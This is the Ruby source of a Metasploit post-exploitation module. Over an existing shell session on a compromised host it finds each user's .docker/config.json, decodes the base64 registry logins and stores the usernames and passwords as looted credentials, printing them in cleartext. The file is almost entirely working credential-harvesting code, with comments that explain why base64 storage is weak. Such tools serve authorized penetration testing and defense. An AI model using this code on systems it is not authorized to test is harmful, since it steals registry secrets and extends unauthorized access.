Path: blob/master/modules/post/multi/gather/docker_creds.rb
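##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

# Post module that reads each user's ~/.docker/config.json over an existing
# shell session and records any registry logins stored there as credentials.
#
# Defensive context: the "auth" value in config.json is only base64, not
# encryption, so anyone able to read the file recovers the registry password.
# Hosts configured with a Docker credential helper (the `credsStore` /
# `credHelpers` settings) are expected to keep the secret outside this file, in
# which case the entries carry no usable "auth" value and nothing is reported.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather Docker Credentials Collection',
        'Description' => %q{
          This module will collect the contents of all users' .docker directories on the targeted
          machine. If the user has already push to docker hub, chances are that the password was
          saved in base64 (default behavior).
        },
        'License' => MSF_LICENSE,
        'Author' => ['Flibustier'],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => ['shell'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # This module is largely based on gpg_creds.rb.

  # Entry point: builds the list of existing per-user .docker directories and
  # hands it to #download_loot. Prints an error and stops when none exist.
  #
  # @return [void]
  def run
    print_status('Finding .docker directories')
    paths = enum_user_directories
            .map { |dir| dir + '/.docker' }
            .select { |dir| directory?(dir) }

    # Array#select always returns an Array, so an emptiness check is enough.
    if paths.empty?
      print_error('No users found with a .docker directory')
      return
    end

    download_loot(paths)
  end

  # Looks for config.json in every directory and parses the ones that exist.
  #
  # @param paths [Array<String>] candidate .docker directories
  # @return [void]
  def download_loot(paths)
    print_status("Looting #{paths.count} directories")
    paths.each do |path|
      file = 'config.json'
      # Non-mutating chomp: the caller's strings are left untouched.
      target = "#{path.chomp}/#{file}"
      next unless file?(target)

      print_status("Downloading #{target} -> #{file}")
      extract(target)
    end
  end

  # Parses one config.json and stores every "user:password" pair found under
  # its "auths" section, using the registry key as the credential realm.
  #
  # An unreadable or malformed file is reported and skipped so that one bad
  # file does not abort processing of the remaining users.
  #
  # @param target [String] remote path of the config.json to read
  # @return [void]
  def extract(target)
    file = read_file(target)
    if file.nil? || file.empty?
      print_error("Unable to read #{target}")
      return
    end

    begin
      parsed = JSON.parse(file)
    rescue JSON::ParserError => e
      print_error("Unable to parse #{target}: #{e.message}")
      return
    end

    auths = parsed.is_a?(Hash) ? parsed['auths'] : nil
    unless auths.is_a?(Hash)
      print_status('No credentials found in config file')
      return
    end

    auths.each do |key, value|
      vprint_status("key: #{key}")
      # Entries without an inline secret have nothing to decode.
      next unless value.is_a?(Hash)

      encoded = value['auth']
      next unless encoded.is_a?(String)

      plain = Rex::Text.decode_base64(encoded)
      next unless plain.include?(':')

      # NOTE(review): this echoes the cleartext password to the console, so it
      # also lands in any console log or spool file that is being kept.
      print_good("Found #{plain}")

      # Split on the FIRST colon only: a password may itself contain ':' and
      # would otherwise be truncated. Empty halves become nil, which is what
      # the unlimited split used to yield for inputs such as "user:".
      username, password = plain.split(':', 2).map { |part| part unless part.empty? }

      credential_data = {
        origin_type: :import,
        module_fullname: fullname,
        filename: target,
        workspace_id: myworkspace_id,
        service_name: 'docker',
        realm_value: key,
        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
        private_type: :password,
        private_data: password,
        username: username
      }
      create_credential(credential_data)

      print_good('Saved credentials')
    end
  end
end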